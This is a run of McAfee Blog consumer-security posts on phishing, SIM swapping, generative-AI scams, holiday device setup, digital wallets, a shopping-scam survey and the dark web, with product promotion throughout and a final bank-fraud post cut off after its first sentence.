How fortunate! You’ve won a free gift, an exclusive service, or a great deal on a trip to Las Vegas. Just remember, whatever “limited time offer” you’re being sold, it’s probably a phishing scam designed to get you to give up your credit card number or identity info. The lure here is something free or exciting at what appears to be little or no cost to you.

The Romance Scam

This one can happen completely online, over the phone, or in person after contact is established. But the romance scam always starts with someone supposedly looking for love. The scammer often puts a phony ad online or poses as a friend-of-a-friend on social media and contacts you directly. But what starts as the promise of love or partnership, often leads to requests for money or pricey gifts. The scammer will sometimes spin a hardship story, saying they need to borrow money to come visit you or pay their phone bill so they can stay in touch. The lure here is simple — love and acceptance.

Account Suspended Scam

Some phishing emails appear to notify you that your bank temporarily suspended your account due to unusual activity. If you receive an account suspension email from a bank that you haven’t opened an account with, delete it immediately, and don’t look back. Suspended account phishing emails from banks you do business with, however, are harder to spot. Use the methods we listed above to check the email’s integrity, and if all else fails, contact your bank directly instead of opening any links within the email you received.

How to avoid phishing attacks

While you can’t outright stop phishing attacks from making their way to your computer or phone, you can do several things to keep yourself from falling for them. Further, you can do other things that might make it more difficult for scammers to reach you.

• Pause and think about the message for a minute.

The content and the tone of the message can tell you quite a lot. Threatening messages or ones that play on fear are often phishing attacks, such as angry messages from a so-called tax agent looking to collect back taxes. Other messages will lean heavily on urgency, like a phony overdue payment notice. And during the holidays, watch out for loud, overexcited messages about deep discounts on hard-to-find items. Instead of linking you off to a proper e-commerce site, they might link you to a scam shopping site that does nothing but steal your money and the account info you used to pay them. In all, phishing attacks indeed smell fishy. Slow down and review that message with a critical eye. It might tip you off to a scam.

• Deal directly with the company or organization in question.

Some phishing attacks can look rather convincing. So much so that you’ll want to follow up on them, like if your bank reports irregular activity on your account or a bill appears to be past due. In these cases, don’t click on the link in the message. Go straight to the website of the business or organization in question and access your account from there. Likewise, if you have questions, you can always reach out to their customer service number or web page.

• Consider the source.

Some phishing attacks occur in social media messengers. When you get direct messages, consider the source. Consider, would an income tax collector contact you over social media? The answer there is no. For example, in the U.S. the Internal Revenue Service (IRS) makes it clear that they will never contact taxpayers via social media. (Let alone send angry, threatening messages.) In all, legitimate businesses and organizations don’t use social media as a channel for official communications. They’ve accepted ways they will, and will not, contact you. If you have any doubts about a communication you received, contact the business or organization in question directly. Follow up with one of their customer service representatives.

• Don’t download attachments. And most certainly don’t open them.

Some phishing attacks involve attachments packed with malware, like ransomware, viruses, and keyloggers. If you receive a message with such an attachment, delete it. Even if you receive an email with an attachment from someone you know, follow up with that person. Particularly if you weren’t expecting an attachment from them. Scammers often hijack or spoof email accounts of everyday people to spread malware.

• Remove your personal info from sketchy data broker sites.

How’d that scammer get your phone number or email address anyway? Chances are, they pulled that info off a data broker site. Data brokers buy, collect, and sell detailed personal info, which they compile from several public and private sources, such as local, state, and federal records, plus third parties like supermarket shopper’s cards and mobile apps that share and sell user data. Moreover, they’ll sell it to anyone who pays for it, including people who’ll use that info for scams. You can help reduce those scam texts and calls by removing your info from those sites. Our Personal Data Cleanup scans some of the riskiest data broker sites and shows you which ones are selling your personal info.

• Use online protection software.

Online protection software can protect you in several ways. First, it can offer web protection features that can identify malicious links and downloads, which can help prevent clicking them. Further, features like our web protection can steer you away from dangerous websites and block malware and phishing sites if you accidentally click on a malicious link. Additionally, our Scam Protection feature warns you of sketchy links in emails, texts, and messages. And overall, strong virus and malware protection can further block any attacks on your devices. Be sure to protect your smartphones in addition to your computers and laptops as well, particularly given all the sensitive things we do on them, like banking, shopping, and booking rides and travel.

The post How to Recognize a Phishing Email appeared first on McAfee Blog.

You consider yourself a responsible person when it comes to taking care of your physical possessions. You’ve never left your wallet in a taxi or lost an expensive ring down the drain. You never let your smartphone out of your sight, yet one day you notice it’s acting oddly.  

Did you know that your device can fall into cybercriminals’ hands without ever leaving yours? SIM swapping is a method that allows criminals to take control of your smartphone and break into your online accounts. 

Don’t worry: there are a few easy steps you can take to safeguard your smartphone from prying eyes and get back to using your devices confidently. 

What Is a SIM Card? 

First off, what exactly is a SIM card? SIM stands for subscriber identity module, and it is a memory chip that makes your phone truly yours. It stores your phone plan and phone number, as well as all your photos, texts, contacts, and apps. In most cases, you can pop your SIM card out of an old phone and into a new one to transfer your photos, apps, etc. 

What Is SIM Swapping? 

Unlike what the name suggests, SIM swapping doesn’t require a cybercriminal to get access to your physical phone and steal your SIM card. SIM swapping can happen remotely. A hacker, with a few important details about your life in hand, can answer security questions correctly, impersonate you, and convince your mobile carrier to reassign your phone number to a new SIM card. At that point, the criminal can get access to your phone’s data and start changing your account passwords to lock you out of your online banking profile, email, and more. 

SIM swapping was especially relevant right after the AT&T data leak. Cybercriminals stole millions of phone numbers and the users’ associated personal details. They could later use these details to SIM swap, allowing them to receive users’ text or email two-factor authentication codes and gain access to their personal accounts. 

How Can You Tell If You’ve Been SIM Swapped? 

The most glaring sign that your phone number was reassigned to a new SIM card is that your current phone no longer connects to the cell network. That means you won’t be able to make calls, send texts, or surf the internet when you’re not connected to Wi-Fi. Since most people use their smartphones every day, you’ll likely find out quickly that your phone isn’t functioning as it should.  

Additionally, when a SIM card is no longer active, the carrier will often send a notification text. If you receive one of these texts but didn’t deactivate your SIM card, use someone else’s phone or landline to contact your wireless provider. 

How to Prevent SIM Swapping 

Check out these tips to keep your device and personal information safe from SIM swapping.  

1. Set up two-factor authentication using authentication apps. Two-factor authentication is always a great idea; however, in the case of SIM swapping, the most secure way to access authentication codes is through authentication apps, versus emailed or texted codes. It’s also a great idea to add additional security measures to authentication apps, such as protecting them with a PIN code, fingerprint, or face ID. Choose pin codes that are not associated with birthdays, anniversaries, or addresses. Opt for a random assortment of numbers.  
2. Watch out for phishing attempts. Cybercriminals often gain fodder for their identity-thieving attempts through phishing. Phishing is a method cybercriminals use to fish for sensitive personal information that they can use to impersonate you or gain access to your financial accounts. Phishing emails, texts, and phone calls often use fear, excitement, or urgency to trick people into giving up valuable details, such as social security numbers, birthdays, passwords, and PINs. Be wary of messages from people and organizations you don’t know. Even if the sender looks familiar, there could be typos in the sender’s name, logo, and throughout the message that are a good tipoff that you should delete the message immediately. Never click on links in suspicious messages. 
3. Use a password manager. Your internet browser likely asks you if you’d like the sites you visit to remember your password. Always say no! While password best practices can make it difficult to remember all your unique, long, and complex passwords and passphrases, do not set up autofill as a shortcut. Instead, entrust your passwords and phrases to a secure password manager, which is included in McAfee+. A secure password manager makes it so you only have to remember one password. The rest of them are encrypted and protected by two-factor authentication. A password manager makes it very difficult for a cybercriminal to gain entry to your accounts, thus keeping them safe. 

Boost Your Smartphone Confidence 

With just a few simple steps, you can feel better about the security of your smartphone, cellphone number, and online accounts. If you’d like extra peace of mind, consider signing up for an identity theft protection service like McAfee+. McAfee, on average, detects suspicious activity ten months earlier than similar monitoring services. Time is of the essence in cases of SIM swapping and other identity theft schemes. An identity protection partner can restore your confidence in your online activities. 

The post How to Protect Your Smartphone from SIM Swapping appeared first on McAfee Blog.

There’s no denying that Generative Artificial Intelligence (GenAI) has been one of the most significant technological developments in recent memory, promising unparalleled advancements and enabling humanity to accomplish more than ever before. By harnessing the power of AI to learn and adapt, GenAI has fundamentally changed how we interact with technology and each other, opening new avenues for innovation, efficiency, and creativity, and revolutionizing nearly every industry, including cybersecurity. As we continue to explore its potential, GenAI promises to rewrite the future in ways we are only beginning to imagine. 

Good Vs. Evil 

Fundamentally, GenAI in and of itself has no ulterior motives. Put simply, it’s neither good nor evil. The same technology that allows someone who has lost their voice to speak also allows cybercriminals to reshape the threat landscape. We have seen bad actors leverage GenAI in myriad ways, from writing more effective phishing emails or texts, to creating malicious websites or code to generating deepfakes to scam victims or spread misinformation. These malicious activities have the potential to cause significant damage to an unprepared world. 

In the past, cybercriminal activity was restricted by some constraints such as ‘limited knowledge’ or ‘limited manpower’. This is evident in the previously time-consuming art of crafting phishing emails or texts. A bad actor was typically limited to languages they could speak or write, and if they were targeting victims outside of their native language, the messages were often filled with poor grammar and typos. Perpetrators could leverage free or cheap translation services, but even those were unable to fully and accurately translate syntax. Consequently, a phishing email written in language X but translated to language Y typically resulted in an awkward-sounding email or message that most people would ignore as it would be clear that “it doesn’t look legit”. 

With the introduction of GenAI, many of these constraints have been eliminated. Modern Large Language Models (LLMs) can write entire emails in less than 5 seconds, using any language of your choice and mimicking any writing style. These models do so by accurately translating not just words, but also syntax between different languages, resulting in crystal-clear messages free of typos and just as convincing as any legitimate email. Attackers no longer need to know even the basics of another language; they can trust that GenAI is doing a reliable job. 

McAfee Labs tracks these trends and periodically runs tests to validate our observations. It has been noted that earlier generations of LLMs (those released in the 2020 era) were able to produce phishing emails that could compromise 2 out of 10 victims. However, the results of a recent test revealed that newer generations of LLMs (2023/2024 era) are capable of creating phishing emails that are much more convincing and harder to spot by humans. As a result, they have the potential to compromise up to 49% more victims than a traditional human-written phishing email¹. Based on this, we observe that humans’ ability to spot phishing emails/texts is decreasing over time as newer LLM generations are released: 

Figure 1: how human ability to spot phishing diminishes as newer LLM generations are released 

This creates an inevitable shift, where bad actors are able to increase the effectiveness and ROI of their attacks while victims find it harder and harder to identify them. 

Bad actors are also using GenAI to assist in malware creation, and while GenAI can’t (as of today) create malware code that fully evades detection, it’s undeniable that it is significantly aiding cybercriminals by accelerating the time-to-market for malware authoring and delivery. What’s more, malware creation that was historically the domain of sophisticated actors is now becoming more and more accessible to novice bad actors as GenAI compensates for lack of skill by helping develop snippets of code for malicious purposes. Ultimately, this creates a more dangerous overall landscape, where all bad actors are leveled up thanks to GenAI. 

Fighting Back 

Since the clues we used to rely on are no longer there, more subtle and less obvious methods are required to detect dangerous GenAI content. Context is still king and that’s what users should pay attention to. Next time you receive an unexpected email or text, ask yourself: am I actually subscribed to this service? Is the alleged purchase date in alignment with what my credit card charges? Does this company usually communicate this way, or at all? Did I originate this request? Is it too good to be true? If you can’t find good answers, then chances are you are dealing with a scam. 

The good news is that defenders have also created AI to fight AI. McAfee’s Text Scam Protection uses AI to dig deeper into the underlying intent of text messages to stop scams, and AI specialized in flagging GenAI content, such as McAfee’s Deepfake Detector, can help users browse digital content with more confidence. Being vigilant and fighting malicious uses of AI with AI will allow us to safely navigate this exciting new digital world and confidently take advantage of all the opportunities it offers. 

The post The Dark Side of Gen AI appeared first on McAfee Blog.

The holiday season often brings a rush of new gadgets—smartphones, tablets, laptops, and smart home devices—into households. One survey revealed that nearly 199 million U.S. adults planned to purchase tech products and services as gifts for the holiday season. For the tech-savvy among us, it also means becoming the go-to person for setting up, troubleshooting, and securing those shiny new devices. But while it’s great to help your loved ones get the most out of their tech, it’s just as important to ensure they’re protected from digital threats like malware, phishing, and privacy breaches.

This year, step up as the digital IT hero of the holidays by taking proactive measures to safeguard your family’s online life. Here’s a guide to help you create a safer digital environment for your loved ones by setting up their devices with robust cybersecurity protections.

1. Install a VPN for Secure Browsing

One of the first steps in protecting new devices is ensuring that internet connections are secure. A Virtual Private Network (VPN) is essential for safeguarding your family’s data, especially when using public Wi-Fi networks at coffee shops, airports, or hotels. Without a VPN, any data you send or receive—such as login details, personal information, or banking credentials—can be intercepted by cybercriminals using simple hacking tools. A VPN encrypts your internet connection, making it much harder for anyone to spy on or steal your information, even on public networks. This layer of security is crucial to protect your privacy and keep your data safe from potential threats.

How to help:

• • Choose a reliable VPN service that has a user-friendly app. The VPN should undergo independent reviews and audits to guarantee the security of your sensitive information.
  • Set it up on your family’s devices, ensuring it activates automatically when connecting to unsecured networks.
  • Walk your loved ones through how to enable the VPN and why it’s important, encouraging them to use the VPN for any online banking, shopping, or work-related tasks they perform while traveling.

2. Ensure Antivirus Software is Up to Date

Antivirus software plays a crucial role in protecting devices from malware, ransomware, and other cyber threats by continuously scanning for malicious activity and preventing harmful files from executing. It acts as a first line of defense, detecting and removing viruses before they can compromise your system or steal sensitive data.

How to help:

• Install or verify that their devices have a strong, reliable antivirus program that offers 24/7 identity monitoring and alerts and AI-powered security for real-time protection against viruses, hackers, and risky links.
• Look for a security suite that also includes protections on social media, like McAfee+ Social Privacy Manager, which can help you adjust 100+ privacy settings across your social media accounts in just a few clicks.
• Configure it for automatic scans and updates, so they don’t have to worry about remembering to run them manually.

3. Set Up Strong Passwords and Enable Multi-Factor Authentication

Passwords are the first and often most critical line of defense for online accounts, but unfortunately, many people still rely on weak or predictable combinations like “password123” or simple sequences of numbers. These easy-to-guess passwords leave accounts vulnerable to cybercriminals who use automated tools to crack them within minutes.

However, the threat doesn’t stop at weak passwords—data breaches pose an even greater risk. When large-scale breaches occur, they often expose millions of usernames and passwords to the public. Even strong, unique passwords can be compromised if they’ve been leaked in a breach, allowing attackers to use those credentials in credential-stuffing attacks, where they attempt to log in to multiple accounts using the same exposed password.

To counteract this, it’s critical to not only set strong, unique passwords for every account but also to enable multi-factor authentication (MFA) so that even if your password falls into the wrong hands, attackers can’t access your account without a second form of verification.

How to help:

• Choose a reputable password manager that offers features like end-to-end encryption and secure password sharing.
• Set up a master password that is long, memorable, and, most importantly, not shared with any other account. A phrase like “SunsetsOverTheBeach2024!” works well because it’s strong but easy to recall.
• Help your family by reviewing their most important accounts and updating them with newly generated, complex passwords through the password manager.
• Enable MFA on your family’s most critical accounts, especially banking and financial accounts, social media accounts, and email accounts, which are often the key to resetting passwords for other services, making them a high-value target for hackers.

4. Set Up Device and Data Backups

Data loss can be catastrophic, whether it’s due to a hardware failure, theft, or ransomware attack. Setting up automatic backups ensures that your family’s important data—such as photos, videos, and documents—is safe, no matter what happens.

How to help:

• Set up automatic cloud backups for their devices, ensuring critical files are backed up regularly. Most major platforms, like Apple and Google, offer built-in cloud backup services.
• Consider using an external hard drive for an additional layer of backup.
• Walk them through how to restore files from a backup in case of data loss and emphasize the peace of mind this brings.

5. Check for Sketchy Apps and Remove Unnecessary Ones

New devices often come pre-loaded with a myriad of apps, many of which your family members may never use. Some of these could be bloatware or even pose security risks by running in the background and collecting data.

How to help:

• Go through the new device’s installed apps with your family. Uninstall any that aren’t necessary, especially those that seem unfamiliar or have poor ratings.
• Warn your family about downloading apps from unofficial app stores, which often harbor malicious software.
• Encourage them to stick to apps from trusted sources like Google Play or the Apple App Store, and show them how to check app permissions.

By helping your family with these key cybersecurity steps, you’re not just setting up their devices—you’re providing them with the tools and knowledge to stay safe online. As the digital IT hero of the holidays, you’ll empower your loved ones to enjoy their new tech with confidence, knowing their data and privacy are protected.

The post How to Be Your Family’s Digital IT Hero for the Holidays appeared first on McAfee Blog.

Tapping your phone at the cash register makes for a smooth trip to the store. Far smoother than fumbling for your card at the checkout or dealing with a bunch of change. That’s the beauty of the digital wallet on your phone. And with that convenience comes something plenty important — keeping that digital wallet secure.

All the personal info, photos, and banking apps we already have on our phones already make them plenty valuable. A digital wallet makes them that much more valuable.

A few steps can keep your phone and digital wallet more secure. Further, other steps can protect your cards and identity if that phone gets lost or stolen.

Let’s start with a look at how digital wallets work.

What is a digital wallet?

For starters, digital wallets work much like a physical wallet. Through service apps like Apple Pay, Google Pay, Samsung Pay, PayPal, and others, you can store various payment types. That includes debit cards, credit cards, gift cards, and bank accounts.

The transaction is highly secure in general. When you use your digital wallet to make a purchase, the app creates a random ID for the transaction. It uses that ID rather than your actual account number to keep things secure. Encryption technology keeps things safer still by scrambling info during the process.

A digital wallet is safe, as long as you guard your smartphone just as closely as you would your physical wallet.

Here’s why you should secure your digital wallet and three tips to help you do so.

Tips to protect your digital wallet

1. Use a lock screen on your phone.

Fewer people use a lock screen than you might think. A finding from our global research showed that only 56% of adults said that they protect their smartphone with a password or passcode.[i] The problem with going unlocked is that if the phone gets lost or stolen, you’ve handed over a large part of your digital life to a thief. Setting up a lock screen is easy. It’s a simple feature found on iOS and Android devices.

2. Set a unique passcode for your wallet.

Always protect your digital wallet with a lock, whether a unique passcode, fingerprint scan, or facial ID. This is the best and easiest way to deter cybercriminals. If you use a numerical code, make it different from the passcode on your phone. Also, make sure the numbers are random. Birthdays, anniversaries, house addresses, and the last digits of your phone number are all popular combinations and are crackable codes to a resourceful criminal.

3. Update your apps and operating system regularly.

Another way to secure your digital wallet is to make sure you always download the latest software updates. Developers are constantly finding and patching security holes, so the most up-to-date software is often the most secure. Turn on automatic updates to ensure you never miss a new release.

4. Download digital wallet apps directly from official websites 

Before you swap your plastic cards for digital payment methods, ensure you research the digital banking app before downloading. Also, ensure that any app you download is through the official Apple or Android store or the financial institution’s official website. Then, check out how many downloads and reviews the app has. That’s one way you can make sure you’re downloading an official app and not an imposter. While most of the apps on official stores are legitimate, it’s always smart to check for typos, blurry logos, and unprofessional app descriptions.

5. Learn how to remotely lock or erase a smartphone.

So what happens if your phone ends up getting lost or stolen? A combination of device tracking, device locking, and remote erasing can help protect your phone and the data on it. Different device manufacturers have different ways of going about it, but the result is the same — you can prevent others from using your phone. You can even erase it if you’re truly worried that it’s in the wrong hands or if it’s gone for good. Apple provides iOS users with a step-by-step guide, and Google offers up a guide for Android users as well.

Protection for your phone all around

No doubt about it. Our phones get more and more valuable as the years go by. With an increasing amount of our financial lives coursing through them, protecting our phones becomes that much more important.

Comprehensive online protection like our McAfee+ plans can protect your phone. And it can protect something else. You. Namely, your privacy and your identity. Here’s a quick rundown: It can …

• Block sketchy links in texts, emails, and messages.
• Block yet more sketchy links in search, while surfing, and on social media.
• Protect your identity in the ways mentioned above by keeping tabs on your credit and accounts.
• Protect your privacy by removing your personal info from shady data broker sites.
• Make you more private still by locking down your privacy settings on social media.
• Help you restore your credit and identity with $2 million in identity theft coverage.
• Also help you cancel and replace lost or stolen cards, like IDs, credit cards, and debit cards.

Protection like this is worth looking into, particularly as our phones become yet more valuable still thanks to digital wallets and payment apps like them.

[i] https://www.mcafee.com/content/dam/consumer/en-us/docs/reports/rp-connected-family-study-2022-global.pdf

The post How to Secure Your Digital Wallet appeared first on McAfee Blog.

As 89% of Americans plan to shop online during this holiday shopping season, many say they’re more concerned about being scammed online than they were last year. One big reason why—AI deepfakes.  

Our 2024 Global Holiday Shopping Scams Study uncovered that 70% of American shoppers say AI-driven scams are changing the way they shop online. 

In all, they think scam emails and messages will be more believable than ever and that it’ll be harder to tell what’s a real message from a retailer or delivery service. With that in mind, 58% of people say they’ll be more alert than ever to when it comes to fake messages. Another 11% said they’ll do less online shopping because of how AI is helping cybercriminals. 

Overall, people say their confidence in spotting online scams is low, particularly when it comes to scams featuring AI-created content. Only 59% of Americans feel confident they can identify deepfakes or AI-generated content. 

The effectiveness of deepfake shopping scams has been shown already, 1 in 5 Americans (21%) said they unknowingly paid for fake products endorsed by deepfake celebrities. For Gen Z and Millennials, that number leaps yet higher, with 1 in 3 people aged 18-34 falling victim to a deepfake scam. Meanwhile, older Americans have avoided these scams, with only 5% of shoppers aged 55 and up saying that they’ve fallen victim to one. 

Additionally, 1 in 5 Americans (20%) say they or someone they know has fallen victim to a deepfake shopping scam, celebrity-based or otherwise. 70% of those people lost money to the deepfake holiday scam. Of those who lost money: 

• More than 1 of 4 (27%) lost more than $500. 

• More than 1 in 10 (11%) lost more than $1,000. 

The Top Holiday Shopping Trends We Spotted This Year

Across our research, three big findings stood out. The volume of scam messages is only increasing, chasing deals could lead to scams, and shopping on social media has risks of its own.

Scam messages continue to rise  

64% of Americans say they receive most of their scam messages via email, 20% encounter them primarily via text, and 16% find them on social media. These messages fall into several categories: 

• 59% of people reported fake missed delivery or delivery problem notifications. 

• Nearly half (44%) said they received alerts about a purchase they didn’t make. 

• Reports of fake messages about credit card or account issues were also high, at 37%. 

• 35% reported seeing phony Amazon security alerts or notifications. 

Chasing deals can be costly  

As the holiday season warms up, 84% of Americans say they’re on the hunt for the best holiday deals. But the rush for discounts could put them at risk. Scammers notoriously underprice hot items to lure in victims. 

• 38% of Americans say they’d jump on a great deal as soon as they see it.  

• Nearly 1 in 5 are willing to buy from unfamiliar retailers if the price is right. 

• 64% of Americans say they are likely to make a purchase from a new retailer they find through social media for holiday shopping, if the deal is good.  

Social shoppers face new kinds of risks 

More than 100 million Americans shop on social media.i While social shopping offers convenience, it also exposes people to new risks, especially as scammers use these platforms to reach victims. We found that shoppers are increasingly turning to social channels, often in significant ways.  

• 90% of Americans say they sometimes see ads from brands they’ve never heard of on social media—which may be legitimate companies or fronts for a scam. 

• 83% of Gen Z consumers say their shopping starts on social media, making it the first stop for holiday deals.  

• Overall, 12% of Americans say they plan to use TikTok Shopping, 7% plan to use Instagram Shopping, and 5% plan to use Pinterest. 

Protecting yourself from scams while shopping for the holidays  

Stick with known, legitimate retailers online 

This is a great one to start with. Directly typing in the correct address for online stores and retailers is a prime way to avoid scammers online. In the case of retailers that you don’t know much about, the U.S. Better Business Bureau (BBB) asks shoppers to do their research and make sure that retailer has a good reputation. The BBB makes that easier with a listing of retailers you can search simply by typing in their name. 

Pay with a credit card instead of your debit card  

In the U.S., the Fair Credit Billing Act offers the public protection against fraudulent charges on credit cards. Citizens can dispute charges of over $50 for goods and services that were never delivered or otherwise billed incorrectly. (Note that many credit card companies have their own policies that improve upon the Fair Credit Billing Act as well.) However, debit cards don’t get the same protection under the Act. Avoid using a debit card while shopping online and use your credit card instead.  

Go unlisted. 

Scammers have to get your contact info from somewhere. Often, they get it from online data brokers and other “people finder” sites. These sites collect and sell massive amounts of personal info to any buyer. You can remove that info from some of the riskiest data brokers with our Personal Data Cleanup service. It can help you remove that info, and with select products it can even manage the removal for you. Likewise, set your social media accounts to “friends and family” only so that your profile info doesn’t show up in search results. 

Think before you click.  

Phishing emails, texts, and sites lure people into clicking links that might lead to malware or handing over their personal info. And they look more believable than ever. If you receive an email or text message asking you to click on a link, it’s best to avoid interacting with the message altogether. Even if it’s a great-sounding deal or indicates it’ll provide useful info such as a parcel delivery update. Always go direct to the source and interact with reputable companies.  

Use AI to beat AI.  

Yet better, you can use the combo of our Scam Protection and Web Protection found in our McAfee+ plans. Powered by our AI technology, they detect sketchy links and keep you from clicking on them by mistake. 

Remember that if it seems too good to be true, it probably is.  

Many scams are effective because the scammer creates a false sense of urgency or preys on a heightened emotional state. Pause before you rush to interact with any message that is threatening or urgent, especially if it is from an unknown or unlikely sender. The same very much applies for deals and sales online. Scammers will pop up bogus online ads and stores for sought-after gifts, of course with no intention of shipping you anything. Look out for offers that seem priced too low and hard-to-find items that are miraculously in stock at an online store you’ve never heard of. Stick with reputable retailers instead. 

 Survey methodology 

The survey, which focused on the topic of deepfakes, scam messages, and holiday shopping, was conducted online in November 2024. 7,128 adults, age 18+, In 7 countries (US, Australia, India, UK, France, Germany, Japan), participated in the study. 

The post How AI Deepfakes and Scams Are Changing the Way We Shop Online appeared first on McAfee Blog.

The dark web. The name raises all kinds of questions. What is the dark web, really? Where is it? Can anyone use it?

Answering these questions can help you stay safer online.

The story of the dark web is a complicated one. It’s a small and highly anonymous portion of the internet. As a result, it has a reputation for harboring criminal activity. We often mention the dark web in our blogs, typically when the conversation turns to identity theft, data breaches, and stolen personal info. Rightfully so. Plenty of cybercrime can be traced right back to the dark web.

Yet cybercriminals didn’t create the dark web. And they’re far from the only people who use it. News outlets like the BBC and the New York Times have a presence there, as does the U.S. Central Intelligence Agency (CIA). Journalists, activists, and everyday citizens use it as well, often to work around oppressive censorship. Even Facebook is there, providing people access to the social media site in regions where it’s blocked.

Anonymity reigns on the dark web. It was designed to work that way. With that, it’s home to a mixed bag of activity, legitimate and illicit alike. Yet that anonymity doesn’t stop us from putting a face onto the dark web — from understanding what it is, where it is, and what happens there.

That starts with a look at the internet and the two primary layers that make it up.

The layers of the internet: The surface web and the deep web 

If you visualize the internet as an ocean, you’ll find it populated with websites and collections of data at all depths. Yet, the typical internet user only has access to the first few feet, a layer of the internet known as the surface web.

The sights you’ll see within the surface web will look familiar. It’s all the blogs, shops, social media sites, and so on that you visit regularly. And it’s easy to get to. You only need to fire up your browser and go. All the sites are public-facing. With a quick search, you can find them.

In all, the surface web contains any destination you can reach through search. To put it more precisely, the surface web accounts for areas of the internet that search engines can “crawl” and index for search. Estimates vary, yet the surface web accounts for roughly 4 to 5% of the internet.

Now, enter the deep web, the next 95% of the internet that is not searchable. Yet, that’s not to say that you don’t travel down into its depths from time to time. In fact, you likely do it daily. Any time you go through a paywall or use a password to access internet content, you’re entering the deep web. The content found there is hidden from search. Examples include logging into your bank account, accessing medical records through your healthcare provider, or using corporate web pages as part of your workday. Even streaming a show can involve a trip to the deep web. None of that content is searchable.

As such, the overwhelming majority of activity within the deep web is legitimate. So while this layer of the internet runs deep, it isn’t necessarily dark. The dark web is something altogether different.

What is the dark web? 

The dark web lives within the deep web. Like the other depths of the deep web, it’s not searchable from the surface web. The people behind the sites and repositories on the dark web keep themselves anonymous. And the reasons vary. Some of them are entirely legitimate, others questionable, and several are outright illegal in nature.

Its origins go back to the 1990s when the U.S. Department of Defense developed the dark web as a means of sending anonymous and encrypted communications. That story might sound familiar. It’s quite like the origin story for the broader internet. That had its roots in the Department of Defense as well. So, just as the broader internet eventually became available to the public, so too did the dark web.

Getting there calls for a special browser because the protocols for the dark web differ from the surface web. Moreover, these browsers strip web traffic of identifiable info, encrypt it, and send it through a series of server jumps. The browsing traffic will appear to go through a server in one country, then a different server in another, and then another.

These steps make it highly difficult to identify the person using the browser. On the flip side, it also makes it difficult to identify the people hosting the sites and services on the dark web.

Without question, privacy is everything on the dark web. For good and for bad.

Legitimate uses of the dark web 

While the notion of the dark web typically gets raised in the context of cybercrime and other illegal activity, it has legitimate uses. Some of these use cases include:

Circumventing censorship  

Well-regarded news outlets such as the BBC and Pro Publica maintain a presence on the dark web to ensure that anyone can access their reporting. This includes people in nations and regions where certain news sources are censored.

Private communication 

For the particularly privacy-conscious, the dark web hosts several resources for encrypted communication. That includes email clients, internet chat, and even social media sites.

Whistleblowing 

Anonymous tips are a part of national security, law enforcement, and journalism as well. The private nature of the dark web confers an added degree of anonymity to tipsters.

The dark web isn’t a place everyday internet users will need, or even want, to go. It’s far more complicated than the surface web—and going in without taking several security measures can make the trip a risky one.

The dark web as a marketplace for cybercrime 

This is where the rubber meets the road from an online protection standpoint. The dark web is also a marketplace for hackers and bad actors. In several ways — as a place to buy or rent malware, a repository for stolen info, and a place to communicate and coordinate attacks.

For starters, the dark web is populated with dark marketplaces. And difficult-to-trace cryptocurrency is the coin of the realm. With dark web stores stocked with ready-made malware kits, bad actors can launch attacks with little technical expertise. Others have done the work for them.

Cybercrime groups of all sizes prop up these shops, which they also use to rent out other services for attacks. For example, a small-time bad actor could easily lease a botnet to wage an attack that slows a targeted website to a crawl. Some cybercrime groups will provide hackers who can run attacks on someone else’s behalf, creating a mercenary “hacker for hire” gig economy.

Likewise, info stolen from a data breach can end up in dark web marketplaces as well. The personal info posted in these marketplaces can range anywhere from emails and passwords to in-depth info like tax ID numbers, health info, and driver’s license numbers.

Some of it goes up for sale. Some of it gets dumped there for free. With the right info in hand, cybercriminals can commit acts of identity theft. That includes claiming unemployment benefits and tax refunds in someone else’s name. In extreme cases, it can lead to bad actors outright impersonating their victims, racking up debts and criminal records along the way.

In all, if it’s hackable and has value, it’s likely for sale on the dark web.

Protect yourself from hackers and bad actors on the dark web 

With all this shady activity on the dark web, you might wonder how you can protect yourself. In fact, you can take several steps to help prevent your info from finding its way there. And you also can take other steps if your info, unfortunately, ends up on the dark web.

Installing online protection software is the first step. Online protection software can help prevent many of the attacks that bad actors can buy on the dark web. It protects against ransomware, adware, spyware, and all manner of malware, whether it’s pre-existing or entirely new.

Yet today’s online protection goes far beyond antivirus. Comprehensive protection like ours protects your privacy and identity as well. It can keep tabs on your identity and credit, create strong passwords, and clean up your personal info online.

Monitor your identity:

An identity monitoring service can actively scan the dark web for personal info like your date of birth, email addresses, credit card numbers, personal identification numbers, and much more. In the event you fall victim to identity theft, our identity theft coverage and restoration can provide up to $1 million in coverage to cover the costs. Plus, it provides the services of a recovery expert with limited power of attorney to help you repair the damage done.

Keep an eye on your credit:

If you spot unusual or unfamiliar charges or transactions in your account, bank, or debit card statements, follow up at once. In general, banks, credit card companies, and many businesses have countermeasures to deal with fraud. Moreover, they have customer support teams that can help you file a claim if needed.

Given all the accounts you likely have a credit monitoring service can help. McAfee’s credit monitoring service can help you keep an eye on changes to your credit score, report, and accounts with prompt notifications and provide guidance so you can tackle identity theft.

Create strong, unique passwords:

With the high number of accounts you need to protect, creating strong, unique passwords for each one can get time consuming. Further, updating them regularly can become a time-consuming task. That’s where a password manager comes in.

A password manager does the work of creating strong, unique passwords for your accounts. These will take the form of a string of random numbers, letters, and characters. They will not be memorable, but the manager does the memorizing for you. You only need to remember a single password to access the tools of your manager.

Close old, risky accounts:

The more online accounts you keep, the greater the exposure you have to data breaches. Each account will have varying degrees of personal and financial info linked to it. And that means each one carries a varying degree of risk if it gets breached. Moreover, some sites and services protect data better than others, which adds another dimension of risk. Closing old and particularly risky accounts can decrease the risk of your personal and financial info winding up in the hands of an identity thief.

With security and savings in mind, McAfee created Online Account Cleanup. It finds and requests the deletion of unused accounts and protects your personal data from data breaches as a result. Monthly scans across your online accounts show a risk level for each account and help you decide which ones to delete.

Use two-factor authentication:

Two-factor authentication is an extra layer of defense on top of your username and password. It adds a one-time-use code to access your login procedure, typically sent to your smartphone by text or call. Together, that makes it tougher for a crook to hack your account if they get hold of your username and password. If any of your accounts support two-factor authentication, the few extra seconds it takes to set up is more than worth the big boost in protection you’ll get.

Protect yourself from cybercriminals on the dark web 

The “dark” in the dark web stands for anonymity. And with anonymity, all kinds of activity follow. Good and bad.

From a security standpoint, the dark web is a haven for all manner of cybercriminals. Understanding how they use the dark web can help you protect yourself from their activities. You have tools for prevention, and you have resources available if your info ends up there or leads to identity theft.

By putting a face on the dark web, you put a face on cybercrime and can help reduce the risk of it happening to you.

The post What is the Dark Web? appeared first on McAfee Blog.

Whether or not you’re much into online banking, protecting yourself from bank fraud is a must. 

